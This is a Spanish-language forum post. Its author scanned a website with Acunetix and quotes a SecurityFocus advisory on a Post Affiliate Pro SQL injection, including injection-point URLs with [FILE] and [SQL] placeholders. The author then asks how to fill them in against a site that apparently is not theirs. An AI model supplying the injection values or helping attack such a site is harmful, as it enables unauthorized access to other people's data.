Holas miren he encontrado una vulnerabilidad en una web con acunetix, y he buscado el correspondiente xploit en securityfocus.com el cual me ha respondido:
Post Affiliate Pro Index.PHP SQL Injection Vulnerability
No exploit is required.
The following examples were provided:
http://www.example.com/merchants/index.php?md=[FILE]
http://www.example.com/postaffiliatepro/merchants/index.php?tm_userid=_&tm_
orderid=&tm_transtype%5B%5D=32&tm_transtype%5B%5D= 1&tm_transtype%5B%5D=2&tm_transtype%5B%5D=4&tm_tra nstype%5B%5D=8&tm_transtype%5B%5D=16&tm_transtype% 5B%5D=64&tm_status=_&tm_day1=25&tm_month1=11&tm_ye ar1=2005&tm_day2=25&tm_month2=11&tm_year2=2005&num rows=20&filtered=1&md=[File]
http://www.example.com/merchants/index.php?um_name=&um_surname=&um_aid=&um_
status=_&numrows=20&filtered=1&md=[File]
http://www.example.com/merchants/index.php?tm_userid=_&tm_orderid=&tm_transt
ype%5B%5D=32&tm_transtype%5B%5D=1&tm_transtype%5B% 5D=2&tm_transtype%5B%5D=4&tm_transtype%5B%5D=8&tm_ transtype%5B%5D=16&tm_transtype%5B%5D=64&tm_status =_&tm_day1=25&tm_month1=11&tm_year1=2005&tm_day2=2 5&tm_month2=11&tm_year2=2005&numrows=20&filtered=1 &md=Affiliate_Merchants_Views_TransactionManager&t ype=all&list_page=0&action=&sortby=ip&sortorder=[SQL]
http://www.example.com/merchants/index.php?um_name=&um_surname=&um_aid=&um_s
tatus=_&numrows=20&filtered=1&md=Affiliate_Merchan ts_Views_AffiliateManager&list_page=0&sortby=a.sur name&action=&sortorder=[SQL]
la cuestion es que nose que tengo que poner en [FILE] y [SQL] creo que en file va un archivo(la base de datos) y en sql la sentencia sql que muestra lo que te interesa, bien pues se algo de sql pero no mucho, y tampoco tengo idea de que poner ni en file ni sql asi que si me pudierais dar una ayudita lo agradeceria, y otra cosa realmente no se que hace este "exploit" que se obtiene con el he mirado la definicion que daba securityfocus pero estaba en ingles y no me he enterao mucho.
Gracias y saludos.
Marcadores